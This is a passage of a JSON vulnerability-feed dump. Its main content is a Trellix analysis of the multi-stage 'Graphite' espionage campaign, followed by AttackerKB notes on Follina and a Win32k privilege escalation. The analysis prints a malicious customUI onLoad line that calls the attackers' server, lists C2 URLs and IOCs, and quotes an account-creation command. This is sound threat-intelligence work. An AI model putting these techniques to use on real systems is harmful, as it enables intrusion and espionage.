<https://ics-cert.us-cert.gov/sites/default/files/ICSJWG-Archive/QNL_DEC_17/Waterfall_top-20-attacks-article-d2%20-%20Article_S508NC.pdf>\n * <https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html>\n * <https://www.midnightbluelabs.com/blog/2018/1/16/analyzing-the-triton-industrial-malware>\n * <https://www.nozominetworks.com/2018/07/18/blog/new-triton-analysis-tool-wireshark-dissector-for-tristation-protocol/>\n * <https://github.com/NozomiNetworks/tricotools>\n * <https://cyberx-labs.com/en/blog/triton-post-mortem-analysis-latest-ot-attack-framework/>\n * <https://vimeo.com/275906105>\n * <https://vimeo.com/248057640>\n * <https://blog.talosintelligence.com/2017/07/template-injection.html>\n * <https://github.com/MDudek-ICS/TRISIS-TRITON-HATMAN>\n", "cvss3": {}, "published": "2018-11-08T00:00:00", "type": "trellix", "title": "Triton Malware Spearheads Latest Attacks on Industrial Systems | McAfee Blogs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-22620"], "modified": "2018-11-08T00:00:00", "id": "TRELLIX:4EE3028711C16E3513FC2CF300440452", "href": "https://www.trellix.com/content/mainsite/en-us/about/newsroom/stories/research/triton-malware-spearheads-latest-generation-of-attacks-on-industrial-systems.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-01-25T00:00:00", "description": "# Prime Minister\u2019s Office Compromised: Details of Recent Espionage Campaign\n\nBy Marc Elias \u00b7 January 25, 2022\n\nA special thanks to Christiaan Beek, Alexandre Mundo, Leandro Velasco and Max Kersten for malware analysis and support during this investigation.\n\n#### Executive Summary\n\nOur Advanced Threat Research Team have identified a multi-stage espionage campaign targeting high-ranking government officials Western Asia and Eastern Europe. As we detail the technical components of this attack, we can confirm that we have undertaken pre-release disclosure to the victims and provided all necessary content required to remove all known attack components from their environments. \n\nThe infection chain starts with the execution of an Excel downloader, most likely sent to the victim via email, which exploits an MSHTML remote code execution vulnerability ([CVE-2021-40444](<https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-defender-blog-mshtml-cve-2021-40444/>)) to execute a malicious executable in memory. The attack uses a follow-up piece of malware called Graphite because it uses Microsoft\u2019s Graph API to leverage OneDrive as a command and control server\u2014a technique our team has not seen before. Furthermore, the attack was split into multiple stages to stay as hidden as possible. \n\nCommand and control functions used an Empire server that was prepared in July 2021, and the actual campaign was active from October to November 2021. The below blog will explain the inner workings, victimology, infrastructure and timeline of the attack and, of course, reveal the IOCs and MITRE ATT&amp;CK techniques.\n\nA number of the attack indicators and apparent geopolitical objectives resemble those associated with the previously uncovered threat actor APT28. While we don\u2019t believe in attributing any campaign solely based on such evidence, we have a moderate level of confidence that our assumption is accurate. That said, we are supremely confident that we are dealing with a very skilled actor based on how infrastructure, malware coding and operation were setup.\n\nTrellix customers are protected by the different McAfee Enterprise and FireEye products that were provided with these indicators.\n\n#### Analysis of the Attack Process\n\nThis section provides an analysis of the overall process of the attack, beginning with the execution of an Excel file containing an exploit for the MSHTML remote code execution vulnerability ([CVE-2021-40444](<https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-defender-blog-mshtml-cve-2021-40444/>)) vulnerability. This is used to execute a malicious DLL file acting as a downloader for the third stage malware we called Graphite. Graphite is a newly discovered malware sample based on a OneDrive Empire Stager which leverages OneDrive accounts as a command and control server via the Microsoft Graph API. \n\nThe last phases of this multi-stage attack, which we believe is associated with an APT operation, includes the execution of different Empire stagers to finally download an Empire agent on victims\u2019 computers and engage the command and control server to remotely control the systems.\n\nThe following diagram shows the overall process of this attack.\n\n **Figure 1. Attack flow**\n\n### First Stage \u2013 Excel Downloaders\n\nAs suggested, the first stage of the attack likely uses a spear phishing email to lure victims into opening an Excel file, which goes by the name \u201cparliament_rew.xlsx\u201d. Below you can see the identifying information for this file:\n\nFile type | Excel Microsoft Office Open XML Format document \n---|--- \nFile name | parliament_rew.xlsx \nFile size | 19.26 KB \nCompilation time | 05/10/2021 \nMD5 | 8e2f8c95b1919651fcac7293cb704c1c \nSHA-256 | f007020c74daa0645b181b7b604181613b68d195bd585afd71c3cd5160fb8fc4 \n \n **Figure 2. Decoy text observed in the Excel file**\n\nIn analyzing this file\u2019s structure, we observed that it includes a folder named \u201ccustomUI\u201d that contains a file named \u201ccustomUI.xml\u201d. Opening this file with a text editor, we observed that the malicious document uses the \u201cCustomUI.OnLoad\u201d property of the OpenXML format to load an external file from a remote server: \n\n** &lt;customUI xmlns**=\"http://schemas.microsoft.com/office/2006/01/customui\" onLoad='https://wordkeyvpload[.]net/keys/parliament_rew.xls!123'&gt; &lt;/customUI&gt;\n\nThis technique allows the attackers to bypass some antivirus scanning engines and office analysis tools, decreasing the chances of the documents being detected. \n\nThe downloaded file is again an Excel spreadsheet, but this time it is saved using the old Microsoft Office Excel 97-2003 Binary File Format (.xls). Below you can see the identifying information of the file:\n\nFile type | Microsoft Office Excel 97-2003 Binary File Format \n---|--- \nFile name | parliament_rew.xls \nFile size | 20.00 KB \nCompilation time | 05/10/2021 \nMD5 | abd182f7f7b36e9a1ea9ac210d1899df \nSHA-256 | 7bd11553409d635fe8ad72c5d1c56f77b6be55f1ace4f77f42f6bfb4408f4b3a \n \nAnalyzing the metadata objects, we can identify that the creator was using the codepage 1252 used in Western European countries and the file was created on October 5th, 2021.\n\n **Figure 3. Document metadata**\n\nLater, we analyzed the OLE objects in the document and discovered a Linked Object OLEStream Structure which contains a link to the exploit of the CVE-2021-40444 vulnerability hosted in the attackers\u2019 server. This allows the document to automatically download the HTML file and subsequently call the Internet Explorer engine to interpret it, triggering the execution of the exploit.\n\n **Figure 4. Remote link in OLE object**\n\nIn this blog post we won\u2019t examine the internals of the CVE-2021-40444 vulnerability as it has already been publicly explained and discussed. Instead, we will continue the analysis on the second stage DLL contained in the CAB file of the exploit.\n\n#### Second Stage \u2013 DLL Downloader\n\nThe second stage is a DLL executable named fontsubc.dll which was extracted from the CAB file used in the exploit mentioned before. You can see the identifying information of the file below:\n\nFile type | PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit \n---|--- \nFile name | fontsubc.dll \nFile size | 88.50 KB \nCompilation time | 28/09/2021 \nMD5 | 81de02d6e6fca8e16f2914ebd2176b78 \nSHA-256 | 1ee602e9b6e4e58dfff0fb8606a41336723169f8d6b4b1b433372bf6573baf40 \n \nThis file exports a function called \u201cCPlApplet\u201d that Windows recognizes as a control panel application. Primarily, this acts a downloader for the next stage malware which is located at hxxps://wordkeyvpload[.]net/keys/update[.]dat using COM Objects and the API \u201cURLOpenBlockingStreamW\u201d. \n\n **Figure 5. Download of next stage malware**\n\nAfter downloading the file, the malware will decrypt it with an embedded RSA Public Key and check its integrity calculating a SHA-256 of the decrypted payload. Lastly, the malware will allocate virtual memory, copy the payload to it and execute it.\n\n **Figure 6. Payload decryption and execution**\n\nBefore executing the downloaded payload, the malware will compare the first four bytes with the magic value DE 47 AC 45 in hexadecimal; if they are different, it won\u2019t execute the payload.\n\n **Figure 7. Malware magic value**\n\n#### Third Stage \u2013 Graphite Malware\n\nThe third stage is a DLL executable, never written to disk, named dfsvc.dll that we were able to extract from the memory of the previous stage. Below you can see the identifying information of the file:\n\nFile type | PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit \n---|--- \nFile name | dfsvc.dll \nFile size | 24.00 KB \nCompilation time | 20/09/2021 \nMD5 | 0ff09c344fc672880fdb03d429c7bda4 \nSHA-256 | f229a8eb6f5285a1762677c38175c71dead77768f6f5a6ebc320679068293231 \n \nWe named this malware Graphite due to the use of the Microsoft Graph API to use OneDrive as command and control. It is very likely that the developers of Graphite used the Empire OneDrive Stager as a reference due to the similarities of the functionality and the file structure used in the OneDrive account of the actors.\n\n **Figure 8. Empire OneDrive stager API requests**\n\nGraphite starts by creating a mutex with the hardcoded name \u201c250gHJAWUI289382s3h3Uasuh289di\u201d to avoid double executions, decrypt the strings and resolve dynamically the APIs it will use later. Moreover, it will calculate a bot identifier to identify the infected computer which is a CRC32 checksum of the value stored in the registry key \u201cHKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\ Cryptography\\MachineGuid\u201d.\n\n **Figure 9. Graphite initializations**\n\nNext, the malware will create a thread to monitor the execution of tasks and upload its results to the OneDrive account. Result files will be uploaded to the \u201cupdate\u201d folder of the attackers\u2019 OneDrive account. \n\n **Figure 10. Thread to monitor task results**\n\nAfter that, the malware will enter into an infinite loop where every 20 minutes it will obtain a new OAuth2 token to use with the Microsoft Graph API requests and determine if there are new tasks to execute in the \u201ccheck\u201d folder of the attackers\u2019 OneDrive account. \n\n **Figure 11. Request of new OAuth2 token**\n\nOnce it obtained a valid OAuth2 token, reconnaissance data is gathered containing the following information from the victims\u2019 systems:\n\n * Running processes\n * .NET CLR version from PowerShell\n * Windows OS version\n\nThe data is compressed using the LZNT1 algorithm and encrypted with a hardcoded AES-256-CBC key with a random IV. The operator tasks are encoded in the same way. Finally, the file containing the system information is uploaded to the folder \u201c{BOT_ID}/update\u201d in OneDrive with a random name.\n\n **Figure 12. Graphite encoding data**\n\nGraphite will also query for new commands by enumerating the child files in the \"check\" subdirectory. If a new file is found, it will use the Graph API to download the content of the file and decrypt it. The decrypted tasks have two fields; the first one is a unique identifier of the task and the second one specifies the command to execute.\n\nThe command value \u201c1\u201d will instruct the malware to send the system information to the command and control again, which is the attackers\u2019 OneDrive. The command value \u201c2\u201d indicates that the decrypted task is a shellcode, and the malware will create a thread to execute it.\n\n **Figure 13. Graphite commands**\n\nIf the received task is a shellcode, it will check the third field with the magic value DE 47 AC 45 in hexadecimal and, if they are different, it won\u2019t execute the payload. The rest of the bytes of the task is the shellcode that will be executed. Lastly, the task files are deleted from the OneDrive after being processed.\n\n **Figure 14. Decrypted operator task**\n\nThe diagram below summarizes the flow of the Graphite malware.\n\n **Figure 15. Graphite execution diagram**\n\n#### Fourth Stage \u2013 Empire DLL Launcher Stager\n\nThe fourth stage is a dynamic library file named csiresources.dll that we were able to extract from a task from the previous stage. The file was embedded into a Graphite shellcode task used to reflectively load the executable into the memory of the process and execute it. Below you can see the identifying information of the file:\n\nFile type | PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit \n---|--- \nFile name | csiresources.dll \nFile size | 111.00 KB \nCompilation time | 21/09/2021 \nMD5 | 138122869fb47e3c1a0dfe66d4736f9b \nSHA-256 | 25765faedcfee59ce3f5eb3540d70f99f124af4942f24f0666c1374b01b24bd9 \n \nThe sample is a generated Empire DLL Launcher stager that will initialize and start the .NET CLR Runtime into an unmanaged process to execute a download-cradle to stage an Empire agent. With that, it is possible to run the Empire agent in a process that\u2019s not PowerShell.exe.\n\nFirst, the malware will check if the malware is executing from the explorer.exe process. If it is not, the malware will exit.\n\n **Figure 16. Process name check**\n\nNext, the malware will try to find the file \u201cEhStorShell.dll\u201d in the System32 folder and load it. With this, the malware makes sure that the original \u201cEhStorShell.dll\u201d file is loaded into the explorer.exe context.\n\n **Figure 17. Loading EhStorShell.dll library**\n\nThe previous operation is important because the follow-up malware will override the CLSID \u201c{D9144DCD-E998-4ECA-AB6A-DCD83CCBA16D}\u201d to gain persistence in the victims\u2019 system, performing a COM Hijacking technique. The aforementioned CLSID corresponds to the \u201cEnhanced Storage Shell Extension DLL\u201d and is handled by the file \u201cEhStorShell.dll\u201d.\n\nComing up next, the malware will load, initialize and start the .NET CLR Runtime, XOR decrypt the .NET next stage payload and load it into memory. Lastly, it will execute the file using the .NET Runtime.\n\n **Figure 18. Decryption of next stage malware**\n\n#### Fifth Stage \u2013 Empire PowerShell C# Stager\n\nThe fifth stage is a .NET executable named Service.exe which was embedded and encrypted in the previous stage. Below you can see the identifying information of the file:\n\nFile type | PE32 executable for MS Windows (console) Intel 80386 32-bit \n---|--- \nFile size | 34.00 KB \nMD5 | 3b27fe7b346e3dabd08e618c9674e007 \nSHA-256 | d5c81423a856e68ad5edaf410c5dfed783a0ea4770dbc8fb4943406c316a4317 \n \nThis sample is an Empire PowerShell C# Stager whose main goal is to create an instance of a PowerShell object, decrypt the embedded PowerShell script using XOR operations and decode it with Base64 before finally executing the payload with the Invoke function.\n\n **Figure 19. Fifth stage code**\n\nThe reason behind using a .NET executable to load and execute PowerShell code is to bypass security measures like AMSI, allowing execution from a process that shouldn\u2019t allow it.\n\n#### Sixth Stage \u2013 Empire HTTP PowerShell Stager\n\nThe last stage is a PowerShell script, specifically an Empire HTTP Stager, which was embedded and encrypted in the previous stage. Below you can see the identifying information of the file:\n\nFile type | Powershell script \n---|--- \nFile size | 6.00 KB \nMD5 | a81fab5cf0c2a1c66e50184c38283e0e \nSHA-256 | da5a03bd74a271e4c5ef75ccdd065afe9bd1af749dbcff36ec7ce58bf7a7db37 \n \nAs we mentioned earlier, this is the last stage of the multi-stage attack and is an HTTP stager highly obfuscated using the Invoke-Obfuscation script from Empire to make analysis difficult.\n\n **Figure 20. Obfuscated PowerShell script**\n\nThe main functionality of the script is to contact hxxp://wordkeyvpload[.]org/index[.]jsp to send the initial information about the system and connect to the URL hxxp://wordkeyvpload[.]org/index[.]php to download the encrypted Empire agent, decrypt it with AES-256 and execute it. \n\n#### Timeline of Events\n\nBased on all the activities monitored and analyzed, we provide the following timeline of events:\n\n **Figure 21. Timeline of the campaign**\n\n#### Targeting\n\nOne of the lure documents we mentioned before (named \u201cparliament_rew.xlsx\u201d) might have been aimed for targeting government employees.\n\nBesides targeting government entities, it appears this adversary also has its sights on the defense industry. Another document with the name \u201cMissions Budget.xlsx\u201d contained the text \u201cMilitary and civilian missions and operations\u201d and the budgets in dollars for the military operations in some countries for the years 2022 and 2023.\n\n **Figure 22. Lure document targeting the defense sector**\n\nMoreover, from our telemetry we also have observed that Poland and other Eastern European countries were of interest to the actors behind this campaign.\n\nThe complete victimology of the actors is unknown, but the lure documents we have seen show its activities are centered in specific regions and industries. Based on the names, the content of the malicious Excel files and our telemetry, targeting countries in Western Asia and Eastern Europe and the most prevalent industries are Defense and Government.\n\n#### Infrastructure\n\nThanks to the analysis of the full attack chain, two hosts related to the attack were identified. The first domain is wordkeyvpload.net which resolves to the IP 131.153.96.114, located in Serbia and registered on the 7th of July 2021 with OwnRegistrar Inc. \n\nQuerying the IP with a reverse DNS lookup tool, a PTR record was obtained resolving to the domain \u201cbwh7196.bitcoinwebhosting.net\u201d which could be an indication that the server was bought from the Bitcoin Web Hosting VPS reseller company.\n\n **Figure 23. Reverse DNS query**\n\nThe main functionality of this command-and-control server is to host the HTML exploit for CVE-2021-40444 and the CAB file containing the second stage DLL.\n\nThe second domain identified is wordkeyvpload.org which resolves to the IP 185.117.88.19, located in Sweden, and registered on the 18th of June 2021 with Namecheap Inc. Based on the operating system (Microsoft Windows Server 2008 R2), the HTTP server (Microsoft-IIS/7.5) and the open ports (1337 and 5000) it is very likely the host is running the latest version of the Empire post-exploitation framework.\n\nThe reason behind that hypothesis is that the default configuration of Empire servers uses port 1337 to host a RESTful API and port 5000 hosts a SocketIO interface to interact remotely with the server. Also, when deploying a HTTP Listener, the default value for the HTTP Server field is hardcoded to \u201cMicrosoft-IIS/7.5\u201d.\n\n **Figure 24. Local Empire server execution with default configuration**\n\nWith the aforementioned information, as well as the extraction of the command and control from the last stage of the malware, we can confirm that this host acts as an Empire server used to remotely control the agents installed in victims\u2019 machines and send commands to execute them.\n\n#### Attribution\n\nDuring the timeline of this operation there have been some political tensions around the Armenian and Azerbaijani border. Therefore, from a classic intelligence operation point of view, it would make complete sense to infiltrate and gather information to assess the risk and movements of the different parties involved. \n\nThroughout our research into the Graphite campaign, we extracted all timestamps of activity from the attackers from our telemetry and found two consistent trends. First, the activity days of the adversary are from Monday to Friday, as depicted in the image below:\n\n **Figure 25. Adversary\u2019s working days**\n\nSecond, the activity timestamps correspond to normal business hours (from 08h to 18h) in the GMT+3 time zone, which includes Moscow Time, Turkey Time, Arabia Standard Time and East Africa Time.\n\n **Figure 26. Adversary\u2019s working hours**\n\nAnother interesting discovery during the investigation was that the attackers were using the CLSID (D9144DCD-E998-4ECA-AB6A-DCD83CCBA16D) for persistence, which matched with an ESET report in which researchers mentioned a Russian Operation targeting Eastern European countries.\n\nAnalyzing and comparing code-blocks and sequences from the graphite malware with our database of samples, we discovered overlap with samples in 2018 being attributed to APT28. We compared for example our samples towards this one: 5bb9f53636efafdd30023d44be1be55bf7c7b7d5 (sha1):\n\n **Figure 27 Code comparison of samples**\n\nWhen we zoom in on some of the functions, we observe on the left side of the below picture the graphite sample and on the right the forementioned 2018 sample. With almost three years in time difference, it makes sense that code is changed, but still it looks like the programmer was happy with some of the previous functions:\n\n **Figure 28 Similar function flow**\n\nAlthough we mentioned some tactics, techniques and procedures (TTPs) of the actors behind this campaign, we simply do not have enough context, similarities or overlap to point us with low/moderate confidence towards APT28, let alone a nation-state sponsor. However, we believe we are dealing with a skilled actor based on how the infrastructure, malware coding and operation was setup. \n\n#### Conclusion\n\nThe analysis of the campaign described in this blog post allowed us to gather insights into a multi-staged attack performed in early October, leveraging the MSHTML remote code execution vulnerability (CVE-2021-40444) to target countries in Eastern Europe. \n\nAs seen in the analysis of the Graphite malware, one quite innovative functionality is the use of the OneDrive service as a Command and Control through querying the Microsoft Graph API with a hardcoded token in the malware. This type of communication allows the malware to go unnoticed in the victims\u2019 systems since it will only connect to legitimate Microsoft domains and won\u2019t show any suspicious network traffic.\n\nThanks to the analysis of the full attack process, we were able to identify new infrastructure acting as command and control from the actors and the final payload, which is an agent from the post-exploitation framework Empire. All the above allowed us to construct a timeline of the activity observed in the campaign.\n\nThe actors behind the attack seem very advanced based on the targeting, the malware and the infrastructure used in the operation, so we presume that the main goal of this campaign is espionage. With a low and moderate confidence, we believe this operation was executed by APT28. To further investigate, we provided some tactics, techniques and procedures (TTPs), indicators on the infrastructure, targeting and capabilities to detect this campaign.\n\n#### MITRE ATT&amp;CK Techniques\n\nTactic | Technique ID | Technique Title | Observable | IOCs \n---|---|---|---|--- \nResource Development | T1583.001 | Acquire Infrastructure: Domains | Attackers purchased domains to be used as a command and control. | wordkeyvpload[.]net \nwordkeyvpload[.]org \nResource Development | T1587.001 | Develop capabilities: Malware | Attackers built malicious components to conduct their attack. | Graphite malware \nResource Development | T1588.002 | Develop capabilities: Tool | Attackers employed red teaming tools to conduct their attack. | Empire \nInitial Access | T1566.001 | Phishing: Spear phishing Attachment | Adversaries sent spear phishing emails with a malicious attachment to gain access to victim systems. | BM-D(2021)0247.xlsx \nExecution | T1203 | Exploitation for Client Execution | Adversaries exploited a vulnerability in Microsoft Office to execute code. | CVE-2021-40444 \nExecution | T1059.001 | Command and Scripting Interpreter: PowerShell | Adversaries abused PowerShell for execution of the Empire stager. | Empire Powershell stager \nPersistence | T1546.015 | Event Triggered Execution: Component Object Model Hijacking | Adversaries established persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects. | CLSID: D9144DCD-E998-4ECA-AB6A-DCD83CCBA16D \nPersistence | T1136.001 | Create Account: Local Account | Adversaries created a local account to maintain access to victim systems. | net user /add user1 \nDefense Evasion | T1620 | Reflective Code Loading | Adversaries reflectively loaded code into a process to conceal the execution of malicious payloads. | Empire DLL Launcher stager \nCommand and Control | T1104 | Multi-Stage Channels | Adversaries created multiple stages to obfuscate the command-and-control channel and to make detection more difficult. | Use of different Empire stagers \nCommand and Control | T1102.002 | Web Service: Bidirectional Communication | Adversaries used an existing, legitimate external Web service as a means for sending commands to and receiving output from a compromised system over the Web service channel. | Microsoft OneDrive \nEmpire Server \nCommand and Control | T1573.001 | Encrypted Channel: Symmetric Cryptography | Adversaries employed a known symmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. | AES 256 \nCommand and Control | T1573.002 | Encrypted Channel: Asymmetric Cryptography | Adversaries employed a known asymmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. | RSA \n \n#### Indicators of Compromise (IOCs)\n\n##### First stage \u2013 Excel Downloaders\n\n40d56f10a54bd8031191638e7df74753315e76f198192b6e3965d182136fc2fa \nf007020c74daa0645b181b7b604181613b68d195bd585afd71c3cd5160fb8fc4 \n7bd11553409d635fe8ad72c5d1c56f77b6be55f1ace4f77f42f6bfb4408f4b3a \n9052568af4c2e9935c837c9bdcffc79183862df083b58aae167a480bd3892ad0 \n\n\n##### Second stage \u2013 Downloader DLL\n\n1ee602e9b6e4e58dfff0fb8606a41336723169f8d6b4b1b433372bf6573baf40 \n\n\n##### Third stage \u2013 Graphite\n\n35f2a4d11264e7729eaf7a7e002de0799d0981057187793c0ba93f636126135f \nf229a8eb6f5285a1762677c38175c71dead77768f6f5a6ebc320679068293231 \n\n\n##### Fourth stage \u2013 DLL Launcher Stager\n\n25765faedcfee59ce3f5eb3540d70f99f124af4942f24f0666c1374b01b24bd9 \n\n\n##### Fifth stage \u2013 PowerShell C# Stager\n\nd5c81423a856e68ad5edaf410c5dfed783a0ea4770dbc8fb4943406c316a4317 \n\n\n##### Sixth stage \u2013 Empire HTTP Powershell Stager\n\nda5a03bd74a271e4c5ef75ccdd065afe9bd1af749dbcff36ec7ce58bf7a7db37 \n\n\n##### URLs\n\nhxxps://wordkeyvpload[.]net/keys/Missions Budget Lb.xls \nhxxps://wordkeyvpload[.]net/keys/parliament_rew.xls \nhxxps://wordkeyvpload[.]net/keys/Missions Budget.xls \nhxxps://wordkeyvpload[.]net/keys/TR_comparison.xls \n\n\nhxxps://wordkeyvpload[.]net/keys/JjnJq3.html \nhxxps://wordkeyvpload[.]net/keys/iz7hfD.html \nhxxps://wordkeyvpload[.]net/keys/Ari2Rc.html \nhxxps://wordkeyvpload[.]net/keys/OD4cNq.html \n\n\nhxxps://wordkeyvpload[.]net/keys/0YOL4.cab \nhxxps://wordkeyvpload[.]net/keys/whmel.cab \nhxxps://wordkeyvpload[.]net/keys/UdOpQ.cab \nhxxps://wordkeyvpload[.]net/keys/D9V5E.cab \n\n\nhxxps://wordkeyvpload[.]net/keys/update.dat \n\n\nhxxps://wordkeyvpload[.]org/index.jsp \nhxxps://wordkeyvpload[.]org/index.php \nhxxps://wordkeyvpload[.]org/news.php \nhxxps://wordkeyvpload[.]org/admin/get.php \nhxxps://wordkeyvpload[.]org/login/process.php \n\n\n##### Domains\n\nwordkeyvpload[.]net \nwordkeyvpload[.]org \njimbeam[.]live \n\n\n##### IPs\n\n131.153.96[.]114 \n185.117.88[.]19 \n94.140.112[.]178 \n\n", "cvss3": {}, "published": "2022-01-25T00:00:00", "type": "trellix", "title": "Prime Minister\u2019s Office Compromised: Details of Recent Espionage Campaign", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2022-01-25T00:00:00", "id": "TRELLIX:6949BCDE9887B6759BD81365E21DD71C", "href": "https://www.trellix.com/content/mainsite/en-us/about/newsroom/stories/research/prime-ministers-office-compromised.html", "cvss": {"score": 0.0, "vector": "NONE"}}], "attackerkb": [{"lastseen": "2023-08-12T02:18:12", "description": "Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability.\n\n \n**Recent assessments:** \n \n**bwatters-r7** at May 31, 2022 12:56pm UTC reported:\n\nEDIT: This was a quick description, and while it is still accurate as far as I know, A Rapid7 Evaluation with greater analysis has been published here: <https://attackerkb.com/topics/Z0pUwH0BFV/cve-2022-30190/rapid7-analysis>\n\nThis is a relatively new vulnerability in the Microsoft Support Diagnostic Tool Vulnerability, so it is likely more information will come out in the coming days. \nCurrently, as seen in the wild, this vulnerability is embedded in a word document and likely distributed with a *.rar file. When the Word document is opened, it reaches out and downloads an HTML file which has a JS section to implement the ms-msdt (Microsoft Support Diagnostic Tool Vulnerability) protocol which is then coerced into launching a command. \nAs reported by Jake Williams in a thread here: <https://twitter.com/MalwareJake/status/1531019243411623939>, the command opens the accomplanying `*.rar` file and pulls a base64 encoded `*.cab` file from it, then expands the *cab file and runs a file contained in the cab file called `rgb.exe` THIS FILENAME IS LIKELY MUTABLE, SO I DO NOT RECCOMMEND POLICING FOR IT WITHOUT OTHER RULES. \nMicrosoft has already published mitigation techniques for this exploit: <https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/> \nUsers are required to delete a single registry key called `HKEY_CLASSES_ROOT\\ms-msdt` though there is little discussion about the side effects of this operation. In his thread, Jake Williams has verified that the removal of this key prevents execution of the embedded payload. \nFurther reading: \n<https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e> \nUntested and unverified PoC: <https://github.com/chvancooten/follina.py/blob/main/follina.py> \n<https://www.scythe.io/library/breaking-follina-msdt-vulnerability>\n\nUPDATE: I adjusted the attacker value up in light of reports by Kevin Beaumont that if the attacker uses an RTF file as the host, then the exploit code will run just viewing the file in the preview pane with explorer.exe. (details here: <https://github.com/JMousqueton/PoC-CVE-2022-30190> and the above doublepulsar blog post)\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 4\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-02T00:00:00", "type": "attackerkb", "title": "CVE-2022-30190", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444", "CVE-2022-30190"], "modified": "2022-06-02T00:00:00", "id": "AKB:1FA9A53C-0452-4411-96C9-C0DD833F8D18", "href": "https://attackerkb.com/topics/Z0pUwH0BFV/cve-2022-30190", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-09-07T18:30:04", "description": "Win32k Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-21887.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at January 18, 2022 4:35pm UTC reported:\n\nLooks like this is a LPE in win32k that is being exploited in the wild according to Microsoft to let attackers escalate their privileges to SYSTEM. Attack complexity on this is high which is understandable given the history of win32k and the complexities regarding its architecture which was built before modern security mitigations were implemented. With that being said though the finder of this bug, at <https://twitter.com/b2ahex/status/1481233350840893442>, notes that exploitation is easy and that this is a patch bypass for CVE-2021-1732, which was a window object type confusion leading to an OOB (out-of-bounds) write as noted by McAfee\u2019s technical writeup at <https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/technical-analysis-of-cve-2021-1732/>.\n\nOf particular note here is that they credit Big CJTeam of Tianfu Cup and RyeLv aka @b2ahex on Twitter for finding this vulnerability. They note that this was exploited in the wild but the mention of Tianfu Cup is interesting as it suggests this was also reported to China\u2019s government via the Chinese Tianfu Cup hacking competition.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 3\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-08T00:00:00", "type": "attackerkb", "title": "CVE-2022-21882", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732", "CVE-2022-21882", "CVE-2022-21887"], "modified": "2022-02-08T00:00:00", "id": "AKB:9E1E5A73-8C4D-4A6A-96A5-14A9041AA2CB", "href": "https://attackerkb.com/topics/KBiVbKrlyU/cve-2022-21882", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-07-04T17:20:52", "description": "In kbase_jd_user_buf_pin_pages of mali_kbase_mem.c, there is a possible out of bounds write due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-210470189References: N/A\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": 